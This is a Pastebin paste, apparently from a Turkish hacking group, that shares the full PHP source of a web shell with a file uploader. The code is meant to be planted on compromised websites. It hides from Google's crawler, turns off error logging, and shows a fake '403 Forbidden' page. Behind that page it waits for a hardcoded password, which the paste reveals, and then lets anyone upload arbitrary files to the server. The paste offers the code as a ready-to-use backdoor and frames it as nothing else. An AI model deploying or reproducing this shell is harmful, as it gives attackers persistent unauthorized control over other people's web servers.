Advertisement
KingSkrupellos

Deccal Access Forbidden Hatası Dosya Yükleyici Shel

Sep 14th, 2017
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.74 KB | None | 0 0
  1. Deccal Giriş Yasak Hatası Dosya Yükleyici Shell
  2.  
  3. [img]http://i.hizliresim.com/Y4pmdl.jpg[/img]
  4.  
  5. [img]http://i.hizliresim.com/PQNm1Q.jpg[/img]
  6.  
  7. [hide][code]<?php  
  8.  /*
  9.  
  10.  */
  11. $auth_pass = "2d2e0f23ee71e15b75c683fef263e037";
  12. $color = "#00ff00";  
  13. $default_action = 'FilesMan';  
  14. @define('SELF_PATH', __FILE__);  
  15. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {  
  16.    header('HTTP/1.0 404 Not Found');  
  17.    exit;  
  18. }  
  19. @session_start();  
  20. @error_reporting(0);  
  21. @ini_set('error_log',NULL);  
  22. @ini_set('log_errors',0);  
  23. @ini_set('max_execution_time',0);  
  24. @set_time_limit(0);  
  25. @set_magic_quotes_runtime(0);  
  26. @define('VERSION', '2.1');  
  27. if( get_magic_quotes_gpc() ) {  
  28.    function stripslashes_array($array) {  
  29.        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);  
  30.    }  
  31.    $_POST = stripslashes_array($_POST);  
  32. }  
  33. function printLogin() {  
  34.    ?>  
  35. <title>403 Forbidden Error</title>  
  36. <h1>Access to this Server is Forbidden</h1>  
  37. <p>Owner of this website has informed me that nobody can enter this area.</p>  
  38. <p>Additionally, a 404 Not Found .. For further information visit => http://www.deccal.org/</p>
  39.    <style>  
  40.        input { margin:0;background-color:#fff;border:1px solid #fff; }  
  41.    </style>  
  42.    <center>  
  43.    <form method=post>  
  44.    <input type=password name=pass>  
  45.    </form></center>  
  46.    <?php  
  47.    exit;  
  48. }  
  49. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))  
  50.    if( empty( $auth_pass ) ||  
  51.        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )  
  52.        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;  
  53.    else  
  54.        printLogin();
  55.  
  56. ?>
  57.  <html>
  58. <head>  
  59.  
  60. <title>DeCCaL Forbidd3n Area</title>
  61. <body bgcolor="black">
  62.    <center>
  63.    <img src="http://i.hizliresim.com/B8N3ZL.png">
  64.    </center>
  65. </body>
  66. </head>  
  67.       <p align="center">
  68.           <font color="black">  
  69.    <center> <?php
  70. echo '<font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></font>';
  71. echo '<font color="#11f0f3"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font>';
  72. if( $_POST['_upl'] == "Upload" ) {
  73.    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b><font face="Iceland" color="11f0f3" size="4px">Done... File Successfully Uploaded!</font></b><br><br>'; }
  74.    else { echo '<b><font face="Iceland" color="11f0f3">File Upload Failed!</font></b><br><br>'; }
  75. }
  76. ?></br></br></hr><font color="#ffffff">http://www.deccal.org/
  77. </center></html>
  78. Password: deccal.org[/code][/hide]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement